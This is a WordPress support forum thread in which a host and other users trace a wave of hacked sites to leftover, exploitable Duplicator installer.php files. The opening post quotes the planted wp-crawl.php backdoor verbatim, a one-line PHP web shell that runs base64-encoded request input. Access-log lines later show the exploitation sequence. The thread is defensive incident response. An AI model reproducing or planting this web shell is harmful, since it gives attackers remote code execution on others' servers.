Support » Fixing WordPress » wp-config.php goes missing – for a lot of customers

wp-config.php goes missing – for a lot of customers

  • dennishermannsen

    (@dennishermannsen)


    5 years ago

    Hi,

    The last couple of hours, our support has been targeted with A LOT of emails that all revolve around the same issue; a customer’s WordPress website suddenly displays the installation process.

    It all seems very related to CVE-2018-12895, but this should’ve been fixed in 4.9.7, and we have customers affected by this that runs the latest version of WordPress.

    We’ve had multiple reports the entire day, across multiple hosting companies in multiple datacenters with very different setups.

    Is there an exploit I don’t know about?

    Edit:
    For all infected versions, we see a file called wp-crawl.php in the WP-root. Contents:

    
<?php @file_put_contents('tempcrawl','<?php '.base64_decode($_REQUEST['q'])); @include('tempcrawl'); @unlink('tempcrawl'); ?>
Viewing 9 replies - 1 through 9 (of 9 total)
  • Moderator Steven Stern (sterndata)

    (@sterndata)

    Volunteer Forum Moderator

    5 years ago

    see https://wordpress.org/support/topic/new-hack-with-file-temp-crawl-php/

    te_taipo

    (@te_taipo)

    5 years ago

    Any common 3rd party plugins? Reason is I am currently watching the development of what looks like an attack vector against a file manager plugin.

    Thread Starter dennishermannsen

    (@dennishermannsen)

    5 years ago

    I haven’t had the time to compare all the plugins across the infected websites. This seems to be the common process:

    xx.xx.xx.xx - - [06/Sep/2018:18:54:44 +0200] "GET / HTTP/1.1" 200 25833 "-" "Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.143 Safari/537.36"
xx.xx.xx.xx - - [06/Sep/2018:18:54:45 +0200] "POST /installer.php HTTP/1.1" 200 309 "<em>deleted</em>.com/wp-admin/admin-ajax.php" "Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.143 Safari/537.36"
xx.xx.xx.xx - - [06/Sep/2018:18:54:45 +0200] "POST /installer-backup.php HTTP/1.1" 200 309 "<em>deleted</em>.com/wp-admin/admin-ajax.php" "Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.143 Safari/537.36"
xx.xx.xx.xx - - [06/Sep/2018:18:54:45 +0200] "GET /wp-config.php HTTP/1.1" 500 204 "-" "Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.143 Safari/537.36"
xx.xx.xx.xx - - [06/Sep/2018:18:54:45 +0200] "GET / HTTP/1.1" 302 0 "-" "Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.143 Safari/537.36"
xx.xx.xx.xx - - [06/Sep/2018:18:54:45 +0200] "GET /wp-admin/setup-config.php HTTP/1.1" 200 4055 "http://<em>deleted</em>.com" "Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.143 Safari/537.36"
xx.xx.xx.xx - - [06/Sep/2018:18:54:46 +0200] "GET /wp-crawl.php?q=ZWNobyAiYmFyYmllZGVuIjs= HTTP/1.1" 200 29 "-" "Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.143 Safari/537.36"
xx.xx.xx.xx - - [06/Sep/2018:18:54:47 +0200] "GET /wp-content/uploads/wp-crawl.php?q=ZWNobyAiYmFyYmllZGVuIjs= HTTP/1.1" 200 29 "-" "Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.143 Safari/537.36"
    Thread Starter dennishermannsen

    (@dennishermannsen)

    5 years ago

    Oh damn.. The installer.php seems to be a duplicator file. Same procedure for _ever_ single infected website.
    Not sure if it’s really Duplicator code inside of it.Shit, it is.

    Can anyone possibly confirm whether or not they have duplicator installed and have been targeted?

    te_taipo

    (@te_taipo)

    5 years ago

    You will have to go back further in the logs to see how installer.php and other non-WP files were installed. This log is the attacker utilising already uploaded attack files.

    But since you may have the ability to query a few users who have this issue, working out which 3rd party plugins they have in common will narrow this down, in particular if they have a plugin in common that handles file managing (for example)

    Thread Starter dennishermannsen

    (@dennishermannsen)

    5 years ago

    https://db.threatpress.com/vulnerability/duplicator/wordpress-duplicator-plugin-1-2-40-arbitrary-code-execution-vulnerability

    It really is Duplicator.
    All the infected installations have Duplicator installed, and the installer.php file is often very old.

    te_taipo

    (@te_taipo)

    5 years ago

    What version of Duplicator was installed?

    Thread Starter dennishermannsen

    (@dennishermannsen)

    5 years ago

    Duplicator doesn’t have to be installed. Previous versions of Duplicator didn’t remove the installer.php file, and this file could be exploited.

    I’m not sure whether or not upgrading to the latest version of Duplicator would remove the file. We just made a script that grepped for a certain string in all installer.php files and deleted them.

    te_taipo

    (@te_taipo)

    5 years ago

    That makes sense.

Viewing 9 replies - 1 through 9 (of 9 total)
  • The topic ‘wp-config.php goes missing – for a lot of customers’ is closed to new replies.

Views